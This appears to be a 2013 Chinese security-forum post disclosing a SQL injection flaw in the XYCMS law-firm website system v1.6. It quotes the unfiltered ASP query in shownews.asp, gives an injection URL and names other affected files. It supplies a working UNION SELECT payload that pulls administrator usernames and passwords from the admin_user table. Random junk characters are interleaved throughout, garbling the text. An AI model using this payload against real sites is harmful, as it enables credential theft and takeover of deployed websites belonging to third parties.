找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2166|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似) T. z9 k  T8 o8 ]6 @' E: f
! U5 ?3 A3 a1 v' y( G% Q
淫荡分割线
2 |# ]8 I# T3 x, U+ o8 d. L--------------------------------------------------------1 S% \" }) P7 P$ Y5 F2 T/ _
1 ]/ F1 {# J: j
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
' k4 y+ d+ g) j3 a源码地址:http://down.chinaz.com/soft/29233.htm
; u* r1 [) _+ L  {/ D) ^% a2 ]! Q
9 i3 s8 \6 w' z. ]漏洞文件:shownews.asp  i3 U0 t& M: b3 D/ R1 H
漏洞代码:7-13行7 T; a" S) r  x+ K
/ ~* d$ g5 r2 ?0 ?. W, U

# ?0 Y$ R6 H; ?" U; q  \<% , I5 B- \1 p! H- Q$ p
id=request.QueryString("id")0 l; Y. \9 `  J8 l/ g! V. w
   
+ B4 E( Q4 v: M) i) D( Q; eset snews=server.createobject("adodb.recordset") % [" T6 |9 {  ^" l
exec="select * from [news] where id="&id
( @9 X. ?1 U& r6 }snews.open exec,conn,1,1
- y2 P- K8 q& d- d1 `%>
! `! y' }' G! \4 o4 |
" m9 Z$ k& o/ [3 d' P2 i
2 \: a  Z% e4 F' T. b什么过滤都没有  直造成注入
8 I' i* G) P# ^ $ l% Y5 `( \3 W* a
注入点:http://127.0.0.1:99/shownews.asp?id=xx; m0 w' s+ S* f5 m! g

- p& J% h$ |' C9 u1 O+ w$ ]# P其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找( Z0 I* z( P6 |  W" Q

2 j, d/ b1 }: W
, P$ V: a. Y8 a9 j4 `exp: union select 1,admin,password,4,5,7 from admin_user
$ _" N4 ?6 k6 X* `) }8 V
6 G+ ^  x9 Q; V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表